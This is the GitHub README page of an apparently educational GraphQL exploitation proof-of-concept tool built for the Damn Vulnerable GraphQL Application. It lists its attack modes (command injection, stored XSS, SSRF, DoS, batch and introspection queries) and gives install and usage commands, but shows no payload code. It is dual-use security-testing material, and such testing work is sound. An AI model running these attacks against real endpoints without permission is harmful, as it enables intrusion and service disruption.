Skip to content

An automated tool for discovering vulnerabilities in GraphQL applications through fuzzing techniques, including OS Command Injection and XSS, with a focus on OWASP Top Ten vulnerabilities.

Notifications You must be signed in to change notification settings

mrmtwoj/GraphQL_exploitation

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

GraphQL Exploitation PoC Tool

Overview

This tool is designed to test and explore vulnerabilities in GraphQL applications. It allows users to perform various types of attacks and retrieve information about the GraphQL schema. The tool also includes references to the OWASP Top Ten vulnerabilities to educate users about common security risks.

Acyber Team Developer

Automatic PoC For Damn Vulnerable GraphQL Application.

Features

  • Perform GraphQL introspection to discover the schema.
  • Execute batch queries to test multiple endpoints.
  • Test for OS Command Injection vulnerabilities.
  • Conduct Stored Cross-Site Scripting (XSS) tests.
  • Analyze resource-intensive queries.
  • Simulate Denial of Service (DoS) attacks.
  • Check for field duplication vulnerabilities.
  • Test for Server-Side Request Forgery (SSRF).
  • Send custom GraphQL requests.

OWASP Top Ten Vulnerabilities

The tool provides information about the OWASP Top Ten vulnerabilities:

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Installation

To run this tool, you need to have Python 3.x installed. You can download it from the official Python website.

Dependencies

Install the required libraries using pip:

pip install requests colorama

Usage

Run the tool with the following command:

python3 graphql_poc.py -u <GraphQL_endpoint_URL> -p <Proxy_URL>

Arguments

-u / --url: The GraphQL endpoint URL you want to test. -p / --proxy: (Optional) The proxy URL for intercepting requests (e.g., http://127.0.0.1:8080).

Example

python3 graphql_poc.py -u http://example.com/graphql -p http://127.0.0.1:8080

Attack Types

After running the tool, you will be prompted to select an attack type:

  • GraphQL Introspection: Discover the GraphQL schema.
  • Batch Query Attack: Send multiple queries at once.
  • OS Command Injection: Test for command injection vulnerabilities.
  • Stored Cross-Site Scripting (XSS): Test for stored XSS vulnerabilities.
  • Resource Intensive Query: Test a resource-intensive query.
  • Denial of Service Attack: Simulate a DoS attack.
  • Field Duplication Attack: Test for duplicate fields in queries.
  • Server-Side Request Forgery (SSRF): Test for SSRF vulnerabilities.
  • Custom GraphQL Request: Send a custom GraphQL request.

Contributing

Contributions are welcome! If you have suggestions for improvements or new features, please open an issue or submit a pull request.

Related Project

For a vulnerable GraphQL application to test against, check out the Damn Vulnerable GraphQL Application. Damn Vulnerable GraphQL Application

License

This project is licensed under the MIT License.

Disclaimer

This tool is intended for educational purposes and ethical hacking only. Use it responsibly and only on systems you have permission to test.

About

An automated tool for discovering vulnerabilities in GraphQL applications through fuzzing techniques, including OS Command Injection and XSS, with a focus on OWASP Top Ten vulnerabilities.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Languages